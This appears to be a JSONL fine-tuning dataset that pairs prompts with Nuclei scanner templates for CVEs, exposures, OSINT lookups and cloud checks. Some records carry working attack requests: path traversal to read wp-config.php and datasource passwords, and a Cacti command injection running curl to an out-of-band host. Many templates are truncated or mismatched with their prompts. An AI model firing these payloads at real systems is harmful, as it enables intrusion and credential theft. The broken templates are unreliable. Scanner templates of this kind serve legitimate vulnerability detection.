tags: osint,osint-social,tellonym,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://tellonym.me/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"on Tellonym\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2016-10972", "input": "Title: Vulnerability (CWE-269) in tagdiv newspaper\nSummary: The newspaper theme before 6.7.2 for WordPress has a lack of options access control via td_ajax_update_panel.\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: tagdiv newspaper\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-10972\n\ninfo:\n name: Newspaper Theme 6.4\u20136.7.1 - Privilege Escalation\n author: pussycat0x\n severity: critical\n description: Newspaper Theme versions 6.4 to 6.7.1 for WordPress lacked proper options access control through td_ajax_update_panel, which led to a Privilege Escalation vulnerability.\n tags: wpscan,cve,cve2016,wp,wordpress,wpscan,wp-theme,newspaper,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/themes/Newspaper/style.css\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2016-10972"} +{"instruction": "Generate a Nuclei template for: Azure Budget Alerts Not Configured", "input": "Title: Azure Budget Alerts Not Configured\nSummary: Azure Budget Alerts Not Configured. Keeping the cost of your Microsoft Azure cloud infrastructure under control is vital for your organization. It's important to ensure that budget exceeding alerts are created to prevent unexpected expenditure within your Azure account.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-budget-alerts-missing\n\ninfo:\n name: Azure Budget Alerts Not Configured\n author: princechaddha\n severity: high\n description: Keeping the cost of your Microsoft Azure cloud infrastructure under control is vital for your organization. It's important to ensure that budget exceeding alerts are created to prevent unexpected expenditure within your Azure account.\n tags: cloud,devops,azure,microsoft,budget,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-budget-alerts-missing"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: pettingzooco-mastodon-instance\n\ninfo:\n name: Pettingzoo.co (Mastodon Instance) User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Pettingzoo.co (Mastodon Instance) user name information check was conducted.\n tags: osint,osint-social,pettingzooco-mastodon-instance,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://pettingzoo.co/api/v1/accounts/lookup?acct={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"display_name\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - WordPress", "input": "Title: Content-Security-Policy Bypass - WordPress\nSummary: Content-Security-Policy Bypass - WordPress. Tags: xss, csp-bypass, wordpress\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: wordpress-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - WordPress\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - WordPress\n tags: xss,csp-bypass,wordpress,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"wordpress.org\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "wordpress-csp-bypass"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cisco-firepower-panel\n\ninfo:\n name: Cisco Secure Firewall Management Center - Panel\n author: Charles D,darses\n severity: info\n description: Cisco Secure Firewall Management Center login panel was detected. Secure Firewall Management Center was formerly known as Firepower Management Center.\n tags: login,cisco,panel,console,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ui/login\" \n matchers:\n - type: word\n words:\n - \"Login\" \n - \"/img/cisco-icon.svg\" \n part: body\n condition: and\n - type: word\n words:\n - \"Cisco Firepower Management Center\" \n - \"Secure Firewall Management Center\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Hidden Functionality", "input": "Title: Hidden Functionality (CWE-912)\nSummary: The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators. Hidden functionality can take many forms, such as intentionally malicious code, \"Easter Eggs\" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when th\nVulnerability Type: Hidden Functionality\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: backdoored-zte\n\ninfo:\n name: ZTE Router Panel - Detect\n author: its0x08\n severity: critical\n description: Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.\n tags: edb,network,zte,telnet,backdoor,router,tcp,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-912"} +{"instruction": "Generate a Nuclei template for: WordPress WooCommerce - Directory Search", "input": "Title: WordPress WooCommerce - Directory Search\nSummary: WordPress WooCommerce - Directory Search. WordPress WooCommerce plugin sensitive directory searches were conducted.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-woocommerce-listing\n\ninfo:\n name: WordPress WooCommerce - Directory Search\n author: dhiyaneshDK\n severity: info\n description: WordPress WooCommerce plugin sensitive directory searches were conducted.\n tags: edb,wordpress,listing,plugin,woocommerce,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/woocommerce/\" \n matchers:\n - type: word\n words:\n - \"Index of\" \n - \"/wp-content/plugins/woocommerce/\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "wordpress-woocommerce-listing"} +{"instruction": "Generate a Nuclei template for: Seeyon - Local File Inclusion", "input": "Title: Seeyon - Local File Inclusion\nSummary: Seeyon - Local File Inclusion. Seeyon is vulnerable to local file inclusion.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: CNVD-2020-62422\n\ninfo:\n name: Seeyon - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Seeyon is vulnerable to local file inclusion.\n tags: cnvd,cnvd2020,lfi,seeyon,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"application/x-msdownload\" \n part: header\n condition: and\n - type: word\n words:\n - \"ctpDataSource.password\" \n part: body\n condition: and", "category": "generic", "severity": "medium", "id": "CNVD-2020-62422"} +{"instruction": "Generate a Nuclei template for: OpenResty Default Page", "input": "Title: OpenResty Default Page\nSummary: OpenResty Default Page. Tags: tech, openresty, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: default-openresty\n\ninfo:\n name: OpenResty Default Page\n author: dhiyaneshDk\n severity: info\n description: OpenResty Default Page\n tags: tech,openresty,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Welcome to OpenResty!\" \n part: body", "category": "generic", "severity": "info", "id": "default-openresty"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Yandex MC", "input": "Title: Content-Security-Policy Bypass - Yandex MC\nSummary: Content-Security-Policy Bypass - Yandex MC. Tags: xss, csp-bypass, yandex-mc\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: yandex-mc-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Yandex MC\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Yandex MC\n tags: xss,csp-bypass,yandex-mc,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"yandex.ru\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "yandex-mc-csp-bypass"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mybb-forum-install\n\ninfo:\n name: MyBB Installation Panel - Detect\n author: ritikchaddha\n severity: high\n description: MyBB installation panel was detected.\n tags: panel,mybb,forum,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/index.php\" \n matchers:\n - type: word\n words:\n - \"MyBB\" \n - \"Installation Wizard\" \n part: body\n condition: and\n - type: word\n words:\n - \"currently locked\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2017-14942", "input": "Title: Vulnerability (CWE-552) in intelbras wrn_150_firmware\nSummary: Intelbras WRN 150 devices allow remote attackers to read the configuration file, and consequently bypass authentication, via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg containing an admin:language=pt cookie.\nVulnerability Type: Vulnerability (CWE-552)\nSeverity: critical\nAffected Products: intelbras wrn_150_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-14942\n\ninfo:\n name: Intelbras WRN 150 - Authentication Bypass\n author: ritikchaddha\n severity: critical\n description: Intelbras WRN 150 router is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication and download the router configuration file by manipulating the admin:language cookie.\n tags: cve,cve2017,intelbras,auth-bypass,router,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2017-14942"} +{"instruction": "Generate a Nuclei template for: Tugboat Configuration File Exposure", "input": "Title: Tugboat Configuration File Exposure\nSummary: Tugboat Configuration File Exposure. A Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets.\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: tugboat-config-exposure\n\ninfo:\n name: Tugboat Configuration File Exposure\n author: geeknik\n severity: critical\n description: A Tugboat configuration file was discovered. Tugboat is a command line tool for interacting with DigitalOcean droplets.\n tags: tugboat,config,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.tugboat\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"authentication\" \n - \"access_token\" \n - \"ssh_user\" \n condition: and", "category": "generic", "severity": "critical", "id": "tugboat-config-exposure"} +{"instruction": "Generate a Nuclei template for: Confluent Access Token", "input": "Title: Confluent Access Token\nSummary: Confluent Access Token. Tags: confluent, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: confluent-accesstoken\n\ninfo:\n name: Confluent Access Token\n author: DhiyaneshDK\n severity: info\n description: Confluent Access Token\n tags: confluent,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "confluent-accesstoken"} +{"instruction": "Generate a Nuclei template for CVE-2022-34534", "input": "Title: Unknown Vulnerability in dw spectrum_server_firmware\nSummary: Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: dw spectrum_server_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-34534\n\ninfo:\n name: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure\n author: ritikchaddha\n severity: high\n description: Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call.\n tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/moduleInformation\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-34534"} +{"instruction": "Generate a Nuclei template for: Canon R-ADV C3325 - Unauth", "input": "Title: Canon R-ADV C3325 - Unauth\nSummary: Canon R-ADV C3325 - Unauth. Canon R-ADV C3325 unauthenticated dashboard has been exposed.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: canon-c3325-unauth\n\ninfo:\n name: Canon R-ADV C3325 - Unauth\n author: ritikchaddha\n severity: high\n description: Canon R-ADV C3325 unauthenticated dashboard has been exposed.\n tags: canon,c3325,unauth,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"writeln('Log Out\" \n - \"Remote UI : Portal\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "canon-c3325-unauth"} +{"instruction": "Generate a Nuclei template for: GraphQL CSRF / GET method", "input": "Title: GraphQL CSRF / GET method\nSummary: GraphQL CSRF / GET method. Cross Site Request Forgery happens when an external website gains ability to make API calls impersonating an user if he visits the website while being authenticated to your API.\nAllowing API calls through GET requests can lead to CSRF attacks, because cookies are added automatically to GET requests by the browser.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: graphql-get-method\n\ninfo:\n name: GraphQL CSRF / GET method\n author: Dolev Farhi\n severity: info\n description: Cross Site Request Forgery happens when an external website gains ability to make API calls impersonating an user if he visits the website while being authenticated to your API.\nAllowing API calls through GET requests can lead to CSRF attacks, because cookies are added automatically to GET requests by the browser.\n tags: graphql,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/graphql?query={__typename}\" \n - \"{{BaseURL}}/api/graphql?query={__typename}\" \n matchers:\n - type: word\n words:\n - \"\"query\"\" \n - \"\"data\"\" \n - \"\"__typename\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header", "category": "generic", "severity": "info", "id": "graphql-get-method"} +{"instruction": "Generate a Nuclei template for: VMWare Cloud - Cross Site Scripting", "input": "Title: VMWare Cloud - Cross Site Scripting\nSummary: VMWare Cloud - Cross Site Scripting. VMWare Cloud is vulnerable to Reflected Cross Site Scripting vulnerability.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: vmware-cloud-xss\n\ninfo:\n name: VMWare Cloud - Cross Site Scripting\n author: tess\n severity: medium\n description: VMWare Cloud is vulnerable to Reflected Cross Site Scripting vulnerability.\n tags: vmware,xss,cloud,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/?redirectTo=/tenant/e&service=\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"let tokens = \"\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "vmware-cloud-xss"} +{"instruction": "Generate a Nuclei template for CVE-2016-10924", "input": "Title: Path Traversal in zedna_ebook_download_project zedna_ebook_download\nSummary: The ebook-download plugin before 1.2 for WordPress has directory traversal.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: zedna_ebook_download_project zedna_ebook_download\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-10924\n\ninfo:\n name: Wordpress Zedna eBook download <1.2 - Local File Inclusion\n author: idealphase\n severity: high\n description: Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.\n tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php\" \n matchers:\n - type: word\n words:\n - \"DB_NAME\" \n - \"DB_PASSWORD\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2016-10924"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Criteo CAS", "input": "Title: Content-Security-Policy Bypass - Criteo CAS\nSummary: Content-Security-Policy Bypass - Criteo CAS. Tags: xss, csp-bypass, criteo-cas\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: criteo-cas-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Criteo CAS\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Criteo CAS\n tags: xss,csp-bypass,criteo-cas,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"criteo.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "criteo-cas-csp-bypass"} +{"instruction": "Generate a Nuclei template for: Apache Guacamole Security Checks", "input": "Title: Apache Guacamole Security Checks\nSummary: Apache Guacamole Security Checks. A simple workflow that runs all Apache Guacamole related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: guacamole-workflow\n\ninfo:\n name: Apache Guacamole Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Apache Guacamole related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "guacamole-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2022-34590", "input": "Title: SQL Injection in hospital_management_system_project hospital_management_system\nSummary: Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in /HMS/admin.php.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: hospital_management_system_project hospital_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-34590\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: high\n description: Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n tags: cve,cve2022,hms,cms,sqli,hospital_management_system_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Admin | Dashboard\" \n - \"Manage Patients\" \n - \"Manage Doctors\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-34590"} +{"instruction": "Generate a Nuclei template for: HIKVISION applyCT Fastjson - Remote Command Execution", "input": "Title: HIKVISION applyCT Fastjson - Remote Command Execution\nSummary: HIKVISION applyCT Fastjson - Remote Command Execution. The HIKVISION comprehensive security management platform applyCT has a remote command execution vulnerability in a low version of Fastjson, through which an attacker can execute arbitrary commands to obtain server privileges\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: hikvision-fastjson-rce\n\ninfo:\n name: HIKVISION applyCT Fastjson - Remote Command Execution\n author: SleepingBag945\n severity: critical\n description: The HIKVISION comprehensive security management platform applyCT has a remote command execution vulnerability in a low version of Fastjson, through which an attacker can execute arbitrary commands to obtain server privileges\n tags: hikvision,fastjson,rce,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"\"code\":\" \n - \"\"msg\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/json\" \n part: header", "category": "generic", "severity": "critical", "id": "hikvision-fastjson-rce"} +{"instruction": "Generate a Nuclei template for: Azure Storage Blob Service Logging Not Enabled", "input": "Title: Azure Storage Blob Service Logging Not Enabled\nSummary: Azure Storage Blob Service Logging Not Enabled. Ensure that Azure Storage Blob service logging is enabled for read, write, and delete requests. The Storage Blob service provides scalable, cost-efficient objective storage in the Azure cloud. Storage logging is performed server-side and allows details for both successful and failed requests to be recorded in the associated storage account. These logs contain the following information about the individual requests: timing information such as start \nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-blob-service-logging-disabled\n\ninfo:\n name: Azure Storage Blob Service Logging Not Enabled\n author: princechaddha\n severity: medium\n description: Ensure that Azure Storage Blob service logging is enabled for read, write, and delete requests. The Storage Blob service provides scalable, cost-efficient objective storage in the Azure cloud. Storage logging is performed server-side and allows details for both successful and failed requests to be recorded in the associated storage account. These logs contain the following information about the individual requests: timing information such as start time, end-to-end latency, server latency, authentication details, concurrency information, and the size of the request/response.\n tags: cloud,devops,azure,microsoft,azure-storage,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-blob-service-logging-disabled"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: queer\n\ninfo:\n name: QUEER User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: QUEER user name information check was conducted.\n tags: osint,osint-social,queer,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://queer.pl/user/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Spo\ud810\udeeczno\u015b\u0107\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Opencast Admin Panel Discovery", "input": "Title: Opencast Admin Panel Discovery\nSummary: Opencast Admin Panel Discovery. An Opencast Admin panel was discovered. Opencast is a free and open source solution for automated video capture and distribution at scale.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: opencast-panel\n\ninfo:\n name: Opencast Admin Panel Discovery\n author: cyllective,daffainfo\n severity: info\n description: An Opencast Admin panel was discovered. Opencast is a free and open source solution for automated video capture and distribution at scale.\n tags: panel,opencast,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin-ng/login.html\" \n matchers:\n - type: word\n words:\n - \"Opencast\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "opencast-panel"} +{"instruction": "Generate a Nuclei template for CVE-2017-5689", "input": "Title: Vulnerability (CWE-269) in hpe proliant_ml10_gen9_server_firmware and others\nSummary: An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).\nVulnerability Type: Vulnerability (CWE-269)\nSeverity: critical\nAffected Products: hpe proliant_ml10_gen9_server_firmware, siemens simatic_itp1000_firmware, siemens simatic_ipc847d_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-5689\n\ninfo:\n name: Intel Active Management - Authentication Bypass\n author: pdteam\n severity: critical\n description: Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.\n tags: cve2017,cve,amt,intel,tenable,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"System Status\" \n - \"Active Management Technology\" \n part: body_2\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-5689"} +{"instruction": "Generate a Nuclei template for CVE-2024-29895", "input": "Title: Vulnerability (CWE-77) in CVE-2024-29895\nSummary: Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-29895\n\ninfo:\n name: Cacti cmd_realtime.php - Command Injection\n author: pussycat0x\n severity: critical\n description: Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.\n tags: cve,cve2024,cacti,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1\" \n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"User-Agent: curl\" \n part: interactsh_request\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2024-29895"} +{"instruction": "Generate a Nuclei template for: pgAudit Flags Not Enabled for PostgreSQL Instances in Cloud SQL", "input": "Title: pgAudit Flags Not Enabled for PostgreSQL Instances in Cloud SQL\nSummary: pgAudit Flags Not Enabled for PostgreSQL Instances in Cloud SQL. Ensure that the \"cloudsql.enable_pgaudit\" and \"pgaudit.log\" database flags are enabled for your Google Cloud PostgreSQL server instances to enable database auditing. These configurations are crucial for compliance with government, financial, and ISO certifications.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-sql-pgaudit-not-enabled\n\ninfo:\n name: pgAudit Flags Not Enabled for PostgreSQL Instances in Cloud SQL\n author: princechaddha\n severity: medium\n description: Ensure that the \"cloudsql.enable_pgaudit\" and \"pgaudit.log\" database flags are enabled for your Google Cloud PostgreSQL server instances to enable database auditing. These configurations are crucial for compliance with government, financial, and ISO certifications.\n tags: cloud,devops,gcp,gcloud,google-cloud-sql,postgresql,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-sql-pgaudit-not-enabled"} +{"instruction": "Generate a Nuclei template for CVE-2025-51501", "input": "Title: Cross-Site Scripting (XSS) in microweber microweber\nSummary: Reflected Cross-Site Scripting (XSS) in the id parameter of the live_edit.module_settings API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: microweber microweber\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-51501\n\ninfo:\n name: Microweber CMS2.0 - Cross-Site Scripting\n author: nukunga\n severity: medium\n description: Reflected Cross-Site Scripting (XSS) in the `id` parameter of the `live_edit.module_settings` API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.\n tags: cve,cve2025,microweber,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2025-51501"} +{"instruction": "Generate a Nuclei template for CVE-2008-6668", "input": "Title: Path Traversal in dirk_bartley nweb2fax\nSummary: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) id parameter to comm.php and (2) var_filename parameter to viewrq.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: dirk_bartley nweb2fax\nIndicators: error, vulnerability detected", "output": "id: CVE-2008-6668\n\ninfo:\n name: nweb2fax <=0.2.7 - Local File Inclusion\n author: geeknik\n severity: medium\n description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted 